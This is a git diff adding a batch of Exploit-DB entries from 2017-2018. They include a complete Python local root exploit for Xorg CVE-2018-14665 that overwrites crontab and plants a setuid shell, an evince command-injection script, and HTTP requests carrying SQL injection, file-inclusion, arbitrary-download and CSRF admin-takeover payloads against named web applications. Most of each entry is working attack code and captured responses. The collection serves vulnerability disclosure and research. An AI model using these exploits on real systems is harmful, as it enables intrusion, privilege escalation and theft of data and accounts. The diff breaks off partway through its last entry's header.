diff --git a/exploits/linux/dos/45824.txt b/exploits/linux/dos/45824.txt new file mode 100644 index 000000000..f1adf9cbd --- /dev/null +++ b/exploits/linux/dos/45824.txt @@ -0,0 +1,22 @@ +# Exploit Title: evince command line injection +# Date: 2017-09-05 +# Exploit Author: Matlink +# Vendor Homepage: https://wiki.gnome.org/Apps/Evince +# Software Link: https://wiki.gnome.org/Apps/Evince +# Version: 3.24.0 +# Tested on: Debian sid +# CVE : CVE-2017-1000083 + +Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083 + +#! /bin/bash + +# define the payload +export PAYLOAD="firefox google.com" + +# Create the malicious .cbt file +dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000 +tar cvf poc.cbt *.jpg + +# Run the malicious file +evince poc.cbt \ No newline at end of file diff --git a/exploits/linux/local/45832.py b/exploits/linux/local/45832.py new file mode 100755 index 000000000..87247b59b --- /dev/null +++ b/exploits/linux/local/45832.py @@ -0,0 +1,89 @@ +# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7) +# Date: 2018-11-07 +# Exploit Author: @bolonobolo +# Vendor Homepage: https://www.x.org/ +# Version: 1.19.5 +# Tested on: RHEL 7.3 && 7.5 +# CVE : CVE-2018-14665 +# Explanation +# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user +# has to be logged in trought console at the moment the PE script launched. +# In fact during the logged in session of the legitimate non-root user, +# a file with the name of the non-root user will be created in the /var/run/console folder. +# With that file present, the same non-root user can launch a Xorg command via SSH. +# +# Usage: $ python poc.py +# $ python poc.py +# [*] Waiting for bolo to connect to the console +# [*] OK --> bolo console opened +# [*] Building root shell wait 2 minutes +# [*] crontab overwritten +# +# ... cut Xorg output ... +# +# [*] Xorg killed +# (II) Server terminated successfully (0). Closing log file. +# [*] Don't forget to cleanup /etc/crontab and /tmp dir +# sh-4.2# id && whoami +# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo) +# root +# sh-4.2# + + +#!/usr/bin/python +import os +import getpass +import subprocess + +userList = [] +path="/var/run/console/" + +def getWhoami(): + return getpass.getuser() + +def getConsole(path): + p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE) + (console, err) = p.communicate() + consoleList = str.splitlines(console) + return consoleList + +def payload(): + f = open("/tmp/payload", "w") + payload = ("cp /bin/sh /usr/local/bin/shell\n" + "echo \"#include \" > /tmp/shell.c\n" + "echo \"#include \" >> /tmp/shell.c\n" + "echo \"#include \" >> /tmp/shell.c\n" + "echo \"#include \" >> /tmp/shell.c\n" + "echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n" + "gcc /tmp/shell.c -o /usr/local/bin/shell\n" + "chmod 4777 /usr/local/bin/shell\n") + f.write(payload) + +def executePayload(): + os.system("chmod +x /tmp/payload") + os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &") + print "[*] crontab overwritten" + os.system("sleep 5") + os.system("pkill Xorg") + print "[*] Xorg killed" + os.system("sleep 120") + return + +def main(): + whoami = getWhoami() + print "[*] Waiting for " + whoami + " to connect to the console" + i = 0 + while (i == 0): + consoleList = getConsole(path) + for user in consoleList: + if user == whoami : + print "[*] OK --> " + user + " console opened" + i = 1 + print "[*] Building root shell wait 2 minutes" + payload() + executePayload() + print "[*] Don't forget to cleanup /etc/crontab and /tmp dir" + os.system("/usr/local/bin/shell") + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/macos/dos/45823.py b/exploits/macos/dos/45823.py new file mode 100755 index 000000000..998c9d3a2 --- /dev/null +++ b/exploits/macos/dos/45823.py @@ -0,0 +1,23 @@ +# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC) +# Date: 2018-11-06 +# Exploit Author: Yair Rodríguez Aparicio +# Vendor Homepage: https://www.globalscape.com/cuteftp +# Software Link: http://go.globalscape.com/download/cuteftp-macosx +# Version: 3.1 +# Tested on: macOS High Sierra 10.13 + +# Steps to Produce the Crash: +# 1.- Run python code : python cute.py +# 2.- Open text.txt and copy content to clipboard +# 3.- Open CuteFTP Mac +# 4.- Clic on "Quick Connect" +# 4.- Paste clipboard on "Host", "User", "Password" and "Port" +# 5.- click on "Run" +# 6.- Crashed! + + + +buffer = "\x41" * 2000 +f = open("text.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/php/webapps/45822.txt b/exploits/php/webapps/45822.txt new file mode 100644 index 000000000..6186c5198 --- /dev/null +++ b/exploits/php/webapps/45822.txt @@ -0,0 +1,58 @@ +# Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740 +# Author: InfinitumIT (https://infinitumit.com.tr) +# Vendor Homepage: centos-webpanel.com +# Software Link: http://centos-webpanel.com/cwp-latest +# Version: Up to v0.9.8.740. +# CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774. +#? Detailed: https://numanozdemir.com/respdisc/cwp.pdf + +# Description: +# Attacker can change target server's root password and execute command, by CSRF vulnerability. +# Also, there is a XSS vulnerability, hacker can exploit the CSRF vulnerability by this XSS +# vulnerability and run bad-purposed JavaScript codes on administrator's browser. +# So, CSRF/XSS to full server takeover. + +# How to Reproduce: +# Hacker can exploit this vulnerability (changing root password) by XSS or CSRF. +# Hacker will create a website and put those codes into source: + + + +# (Update newpassword as the password that you want to change.) + +# If hacker wants to exploit this by CSRF, CWP administrator will click hacker's website. +# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website) +# http://targetserver:2030/admin/index.php?module= +# After exploiting, you can connect to server by Putty or access the CWP panel with the password +# that you have specified from 2030 port. + +# The second vulnerability is remote command execution. +# Hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too. +# Again, hacker will create a website and put those codes into source: + + + +# (Update whoami as command that you want to run.) + +# Same logic like top, if hacker wants to exploit this by CSRF, CWP administrator will click hacker's website. +# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website) +# http://targetserver:2030/admin/index.php?module= + +# shouldnt think that CSRF/XSS are unimportant vulnerabilities. +# for secure days... \ No newline at end of file diff --git a/exploits/php/webapps/45825.txt b/exploits/php/webapps/45825.txt new file mode 100644 index 000000000..da098aa6d --- /dev/null +++ b/exploits/php/webapps/45825.txt @@ -0,0 +1,50 @@ +# Exploit Title: Surreal ToDo 0.6.1.2 - SQL Injection +# Dork: N/A +# Date: 2018-11-08 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://getsurreal.com/surrealtodo +# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip +# Version: 0.6.1.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/ajax.php?action=lists&page_id=[SQL] +# +GET /[PATH]/ajax.php?action=lists&page_id=1%20AND%201=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 07 Nov 2018 23:41:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1783 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/search=[SQL] +# +GET /[PATH]/?search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 07 Nov 2018 23:44:26 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 5284 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45826.txt b/exploits/php/webapps/45826.txt new file mode 100644 index 000000000..89404f993 --- /dev/null +++ b/exploits/php/webapps/45826.txt @@ -0,0 +1,30 @@ +# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion +# Dork: N/A +# Date: 2018-11-08 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://getsurreal.com/surrealtodo +# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip +# Version: 0.6.1.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?content=[FILE] +# +GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 07 Nov 2018 23:58:36 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1885 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45827.txt b/exploits/php/webapps/45827.txt new file mode 100644 index 000000000..9d7888a0c --- /dev/null +++ b/exploits/php/webapps/45827.txt @@ -0,0 +1,37 @@ +# Exploit Title: Alienor Web Libre 2.0 - SQL Injection +# Dork: N/A +# Date: 2018-11-08 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://alienor.org/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php +# +POST /[PATH]/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 306 +identifiant=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mot_de_passe=&inventaire=Inventaire +HTTP/1.1 200 OK +Date: Thu, 08 Nov 2018 22:07:19 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 81 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45830.txt b/exploits/php/webapps/45830.txt new file mode 100644 index 000000000..493e18671 --- /dev/null +++ b/exploits/php/webapps/45830.txt @@ -0,0 +1,43 @@ +# Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.musicco.app/ +# Software Link: https://codeload.github.com/micser/musicco/zip/master +# Version: 2.0.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe + +# /[PATH]/index.php +#3592 } elseif (isset($_GET['getAlbum'])) { +#3593 $parent = $_GET['parent']; +#3594 $album = $_GET['album']; +#3595 $rootPath = realpath($parent); +#3596 $zip = new ZipArchive(); +#3597 $zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE); + +GET /[PATH]/?getAlbum&parent=../../../../Efe_S1/apache/conf&album=Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 09 Nov 2018 14:24:42 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: musicco=rlparl6g67tsok72of1ln5tj23; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment;filename="Efe.zip" +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: application/zip, application/octet-stream \ No newline at end of file diff --git a/exploits/php/webapps/45831.txt b/exploits/php/webapps/45831.txt new file mode 100644 index 000000000..44f23d799 --- /dev/null +++ b/exploits/php/webapps/45831.txt @@ -0,0 +1,52 @@ +# Exploit Title: Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/ +# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip +# Version: 2.6.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/dca_resetpw.php +# +POST /[PATH]/dca_resetpw.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari +HTTP/1.1 200 OK +Date: Fri, 09 Nov 2018 12:47:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 842 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/dca_resetpw.php +# + + +
+Username:admin + +New Password: + +Confirm Password: + +input name="submit_reset" value="Change Password" type="submit"> + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45833.txt b/exploits/php/webapps/45833.txt new file mode 100644 index 000000000..c7ccfc1d3 --- /dev/null +++ b/exploits/php/webapps/45833.txt @@ -0,0 +1,53 @@ +# Exploit Title: Tina4 Stack 1.0.3 - SQL Injection / Database File Download +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://tina4.com/ +# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip +# Version: 1.0.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/kim.db +# +GET /[PATH]/kim.db HTTP/1.1 +Host: TARGET:12345 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Server: nginx/1.7.7 +Date: Fri, 09 Nov 2018 17:21:23 GMT +Content-Type: application/octet-stream +Content-Length: 22528 +Last-Modified: Fri, 09 Nov 2018 17:09:46 GMT +Connection: keep-alive +Etag: "5be5bf5a-5800" +Accept-Ranges: bytes + +# +view-source:kim.db / 3ˆ AdminAdminadmin$2y$10$ATw/7BHxoZezY0UfffIq3.zAn8bzP6NPBpmh9Qmk5e4X8HHOjLAba2018-11-09 15:25:24Active + +# +query('SELECT * FROM user'); + +while ($p = $sonuc->fetchArray()) {?> + +

+

+ + + +# POC: +# 2) +# http://localhost/[PATH]/kim/menu/get/1 [SQL] +# \ No newline at end of file diff --git a/exploits/php/webapps/45834.txt b/exploits/php/webapps/45834.txt new file mode 100644 index 000000000..bba790bc3 --- /dev/null +++ b/exploits/php/webapps/45834.txt @@ -0,0 +1,89 @@ +# Exploit Title: Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-09 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://tina4.com/ +# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip +# Version: 1.0.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/kim/profile +# +POST /[PATH]/kim/profile HTTP/1.1 +Host: TARGET:12345 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: TINA4=ov6d6tvb04jf1drutog305d3a0 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------2889126544277769229510236 +Content-Length: 1183 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtUSER_ID" +1 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +4194304 +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtPHOTO"; filename="" +Content-Type: application/octet-stream +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtFIRST_NAME" +Admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtLAST_NAME" +Admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtEMAIL" +admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtPASSWORD" +admin_Efe +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtSTATUS" +Active +-----------------------------2889126544277769229510236 +Content-Disposition: form-data; name="txtCREATED" +2018-11-09 15:25:24 +-----------------------------2889126544277769229510236-- +HTTP/1.1 302 Found +Server: nginx/1.7.7 +Date: Fri, 09 Nov 2018 17:05:44 GMT +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked +Connection: keep-alive +X-Powered-By: PHP/7.0.0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Location: /kim/profile + +#/[PATH]/kim.db +#view-source: 3ˆ Admin_EfeAdmin_Efeadmin_Efe$2y$10$I6HLywdXPGjxy6XLZQ0uT.E/eKrlLQbyCwOlsuZZl75i.HGuWscRq2018-11-09 15:25:24Active + +# POC: +# 2) +# http://localhost/[PATH]/kim/profile +# + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45835.txt b/exploits/php/webapps/45835.txt new file mode 100644 index 000000000..6cde9c852 --- /dev/null +++ b/exploits/php/webapps/45835.txt @@ -0,0 +1,35 @@ +# Exploit Title: Easyndexer 1.0 - Arbitrary File Download +# Dork: N/A +# Date: 2018-11-10 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/easyndexer/ +# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/src/showtif.php?file=[FILE]&name=Efe +# +POST /[PATH]/src/showtif.php?file=C:/Windows/win.ini&name=Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sat, 10 Nov 2018 18:07:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=du96l4lnqqcrmb8jamqk0ntib5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Disposition: attachment; filename=Efe.ini +Content-Length: 564 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/45836.txt b/exploits/php/webapps/45836.txt new file mode 100644 index 000000000..4f1a6c870 --- /dev/null +++ b/exploits/php/webapps/45836.txt @@ -0,0 +1,102 @@ +# Exploit Title: ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.abc-erp.com/ +# Software Link: https://netcologne.dl.sourceforge.net/project/abc-erp/abc_v_0_6_4.zip +# Version: 0.6.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# GET /[PATH]/admin/run/_configurar_perfil.php?usuario=efe&contrasena1=efe&contrasena2=efe&nombre=1&email=efe@omerefe.com&old_usuario=admin +# + +# POC: +# 2) +# http://localhost/[PATH]/admin/run/_configurar_perfil.php +# +POST /[PATH]/admin/run/_configurar_perfil.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3657142241469910112719562727 +Content-Length: 770 +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="usuario" +admin +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="contrasena1" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="contrasena2" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="nombre" +efe +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="email" +efe@omerefe.com +-----------------------------3657142241469910112719562727 +Content-Disposition: form-data; name="old_usuario" +admin +-----------------------------3657142241469910112719562727-- +HTTP/1.1 302 Found +Date: Sat, 10 Nov 2018 22:48:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=q4h99gt9616juhb7qvkehf0u87; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: http://192.168.1.27/exploitdb/abc_v_0_6_4/?id=login +Content-Length: 187 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html;charset=utf-8 + +# POC: +# 3) +# http://localhost/[PATH]/admin/run/_configurar_perfil.php +# + + +
+
+ Datos del Usuario +
    +
  1. + + +
    2. +
  2. + + (sólo se modificará si escribe algún valor) +
    3. +
  3. + + (sólo se modificará si escribe algún valor) +
    4. +
  4. + + +
    5. +
  5. + + +
    6. +
+
+
+ + +
+
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45837.txt b/exploits/php/webapps/45837.txt new file mode 100644 index 000000000..9e3c8ff88 --- /dev/null +++ b/exploits/php/webapps/45837.txt @@ -0,0 +1,38 @@ +# Exploit Title: Gumbo CMS 0.99 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://gumbo-cms.net/ +# Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip +# Version: 0.99 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users... +# http://localhost/[PATH]/settings/en +# +POST /[PATH]/settings/en HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: general_purpose=791f2pg746e79031nl9e69kjp2 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 268 +language=fr2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' +HTTP/1.1 200 OK +Date: Sat, 10 Nov 2018 23:49:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 710 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45838.txt b/exploits/php/webapps/45838.txt new file mode 100644 index 000000000..5003b0e10 --- /dev/null +++ b/exploits/php/webapps/45838.txt @@ -0,0 +1,34 @@ +# Exploit Title: Silurus Classifieds Script 2.0 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://snowhall.com/store/silurus/ +# Software Link: https://netcologne.dl.sourceforge.net/project/silurus/silurus_2.0.zip +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/wcategory.php?ID=[SQL] +# +GET /[PATH]/wcategory.php?ID=%36%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=9ujoo8291nqkbribmilpl0sdo3; __utma=112705988.1527518065.1541929662.1541929662.1541929662.1; __utmb=112705988.1.10.1541929662; __utmc=112705988; __utmz=112705988.1541929662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 08:48:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45839.txt b/exploits/php/webapps/45839.txt new file mode 100644 index 000000000..5bc1639cc --- /dev/null +++ b/exploits/php/webapps/45839.txt @@ -0,0 +1,82 @@ +# Exploit Title: ClipperCMS 1.3.3 File Upload CSRF Vulnerability +# Date: 2018-11-11 +# Exploit Author: Ameer Pornillos +# Website: http://ethicalhackers.club +# Vendor Homepage: http://www.clippercms.com/ +# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3 +# 